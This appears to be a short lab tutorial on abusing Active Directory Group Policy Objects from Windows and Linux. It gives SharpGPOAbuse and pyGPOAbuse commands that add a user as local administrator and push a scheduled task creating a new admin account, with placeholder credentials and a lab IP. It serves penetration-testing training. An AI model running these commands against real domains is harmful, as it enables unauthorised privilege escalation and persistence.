GPO Attacks

We discussed the theory behind GPOs here.

To abuse GPOs from windows we mainly use SharpGPOAbuse

Option	Description
--AddUserRights	Add rights to a user
--AddLocalAdmin	Add a user to the local admins group
--AddComputerScript	Add a new computer startup script
--AddUserScript	Configure a user logon script
--AddComputerTask	Configure a computer immediate task
--AddUserTask	Add an immediate task to a user

For example we can use AddLocalAdmin to grant administrative access to a user

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount otter --GPOName "Default Security Policy - WKS"

[!info] --AddLocalAdmin option will overwrite any existing Administrator if this policy is given higher priority. This could create problems if the Administrators or any other options are locally set on the machines, as they will be replaced. It is recommended to experiment with these changes in a controlled environment, such as this lab.

To abuse GPOs from Linux we use pyGPOAbuse.

Before we abuse this GPO, let's create a backup so we can restore it once we are done

python3 GPOwned.py -u otter -p 'SomethingSecure123!' -d domain.com -dc-ip 10.10.10.10 -gpcmachine -backup backupgpo -name "{<GUID>}"

Next we can modify the GPO: this tool allowed us to run PowerShell or cmd commands with the options -PowerShell or -command, respectively

python3 pygpoabuse.py domain.com/otter:'SomethingSecure123!' -gpo-id <GPO_ID> -command "net user plaintext Password1234 /add && net localgroup Administrators plaintext /add" -taskname "addAdmin" -description "totally leigt i swear" -dc-ip 10.10.10.10 -v